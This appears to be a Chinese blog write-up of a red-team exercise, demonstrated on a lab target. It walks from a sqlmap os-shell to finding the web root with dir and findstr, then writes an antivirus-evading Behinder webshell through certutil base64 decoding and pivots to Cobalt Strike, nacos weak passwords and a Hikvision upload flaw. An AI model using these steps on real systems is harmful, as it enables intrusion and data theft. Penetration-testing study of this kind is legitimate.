记某次HVV:通过sql注入打入内网

最新推荐文章于 2024-11-12 14:54:23 发布
最新推荐文章于 2024-11-12 14:54:23 发布
阅读量354 收藏 8
点赞数 11
文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44217321/article/details/135690618
版权

免责声明

本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者以及本公众号团队对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!

前言

某次hvv打点遇到的,这里我用靶场作为演示为大家提供一个sqlmap注入后,找网站绝对路径的思路。

正文

前提:sqlmap注入可以使用os-shell,且为dba权限。

01 os-shell查找网站绝对路径

fsutil fsinfo drives   //先看系统都有哪些盘

这里可以找一张图片然后通过find命令来寻找它的路径(这里我选择找网站的一个背景图)。

dir /a /s /b C:\ | findstr "loginbg.jpg" >111.txt  //在C盘中查找loginbg.jpg

type 111.txt

返回空,说明网站根目录不在C盘

dir /a /s /b D:\ | findstr "loginbg.jpg" >111.txt   //在D盘中查找loginbg.jpg

type 111.txt

成功找到目录猜测为1和2,我选择写到D:\xxx\Content\image目录下

 

02 os-shell写入冰蝎免杀马

1.将冰蝎webshell进行base64加密,分成4段进行传输。

2.解密冰蝎马

certutil -decode D:\xxx\Content\images\Test.txt D:\xxx\Content\images\text2.aspx

//第一个路径为写入webshell的txt绝对径,第二个路径是生成冰蝎马的路径(一定要在网站绝对路径下)

这里我之前解密过一次,所以提示文件存在。

3.访问webshell,冰蝎马成功写入网站

4.连接webshell

 

03 内网

之后就是简单的传免杀马上线cs了。

扫描内网网段发现nacos,好家伙弱口令,直接读到数据库密码,连上数据库。

好家伙,内网还有海康威视文件上传,传马,上线CS。

 

玄知安全实验室
关注
通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞
xiaokp7的博客
07-24 366
通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。
某次HVV:文件上传打入内网
2401_84466229的博客
06-16 1534
某次地市hvv发现一个某友文件上传漏洞,通过扫描内网网段,发现大量数据库弱口令,主机密码复用,及MS-17010。个人认为本文比较重要的是mssql通过Agent Job执行无回显命令上线CS(我试了好几种最后就这个成功了),还有翻数据(数据库,照片或者表格)和密码本(桌面应用程序抓密码、txt\xlsx\doc等文档、浏览器历史密码),内网渗透主打就是一个认真仔细,登上内网机器一定要翻个底朝天。由于数据敏感性,这里只截取一些片段讲解,给大家提供一个思路。
某次HVV:通过windows特性获取内网权限
weixin_44217321的博客
01-16 493
前段时间参加了某地HVV行动,取得了不错的成绩,故开篇录一下在HVV中遇到的一些好的思路。此篇为HVV合集的第一篇,后续有好的思路会继续分享给大家。
某次HVV:用友文件上传打穿内网
weixin_44217321的博客
02-26 650
某次地市hvv发现一个某友文件上传漏洞,通过扫描内网网段,发现大量数据库弱口令,主机密码复用,及MS-17010。 个人认为本文比较重要的是mssql通过Agent Job执行无回显命令上线CS(我试了好几种最后就这个成功了),还有翻数据(数据库,照片或者表格)和密码本(桌面应用程序抓密码、txt\xlsx\doc等文档、浏览器历史密码),内网渗透主打就是一个认真仔细,登上内网机器一定要翻个底朝天。 由于数据敏感性,这里只截取一些片段讲解,给大家提供一个思路。
hvv面试常见漏洞之SQL注入
Crazy_Stone_liu的博客
06-06 913
大致将从原理、类型、攻击代码、绕过、防御、告警分析这几个方面来进行阐述。
地级市HVV | SQL注入分享
浪飒sec
09-07 972
本文对地级市HVVSQL注入导致连锁反应的两个案例进行分享
SQL注入详解(万字文章详解)
追光者的博客
03-12 8628
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
一次蓝初HVV面试
m0_74271951的博客
04-19 1894
蓝初HVV面试
SQL注入GetShell的方法(1)
forinput的博客
05-06 4467
SQL注入getshell的五中方式
web安全-3-SQL注入漏洞
qq_57410330的博客
04-05 963
讲解了pikachu靶场的搭建,以及sql注入内容
hvv-rest:汉堡公共交通的HTTP API
05-23
通过Docker Docker映像 。 docker run -d -p 3000:3000 derhuerst/hvv-rest:5 注意: Docker映像不包含Redis服务器。 手动地 git clone https://github.com/derhuerst/hvv-rest.git cd hvv-rest git checkout 5 ...
HVV面试的总结(超级详细)
06-03
HVV面试宝典
2022年Hvv面试精华:应急与防御SQL/Cross-site Forgery漏洞
该题库聚焦于网络安全中的两个关键漏洞类型:SQL注入和跨站请求伪造(CSRF)。 首先,我们来深入理解SQL注入漏洞。它源于开发人员未能对用户输入进行充分验证,导致恶意SQL代码在查询语句中被执行。SQL注入分为显式和...
如何在Linux中使用Cron定时执行SQL任务
Mr_Wanter
11-08 615
linux crontab 定时执行sql脚本。
[极客大挑战 2019]LoveSQL 1
2301_80148821的博客
11-08 784
又是一道SQL题,还和上面Easy_SQL是一个系列的题。
SQL面试题——奔驰面试题
最新发布
11-12 51
我们上报上来的数据包含当前的驾驶模式和当前时间戳,我们可以把下次上报上来的时间减去当前时间的差作为这个驾驶模式的形式时间,很多人可能会说要不要判断下次上来的驾驶模式是不是和当前的相当呀。如果相等作为条件,SPORT 的驾驶时长就是TS3-TS1,如果没有这个条件SPORT 的驾驶时长就是TS4-TS1。那这个问题就很简单了,我们获取下一次上报的时间和当前时间做差,当成当前驾驶模式的形式时间。前面我们已经有了每种驾驶模式的驾驶时间,我们只需要按照驾驶时间排序即可。这两个放在一起的话,我们可以这样写。
PostgreSQL 表文件损坏异常
云端的博客
11-09 173
PostgreSQL 表文件损坏异常
sql server启用远程连接与修改默认端口
qtvb1987的专栏
11-11 207
SQL SERVER安装目录下,C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe添加到允许的列表中。点击SQL Server 服务选项,确定SQL Server是正在运行的。三,SQL Server配置管理器,七,测试本地数据库连接服务器数据库。五,入站规则 添加你开放的端口。四,手动修改数据库的连接端口。二,sa账号状态属性启用。3)客户端IP改为一致。六,允许应用通过防火墙。
pandas的to_sql方法中使用if_exists=‘replace‘
weixin_73060959的博客
11-12 217
选择if_exists参数的值取决于你的具体需求。如果你需要保留现有数据并添加新数据,使用append。如果你需要替换现有数据,使用replace,但要小心数据丢失和性能问题。如果只是想检查表是否存在而不进行操作,使用fail。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值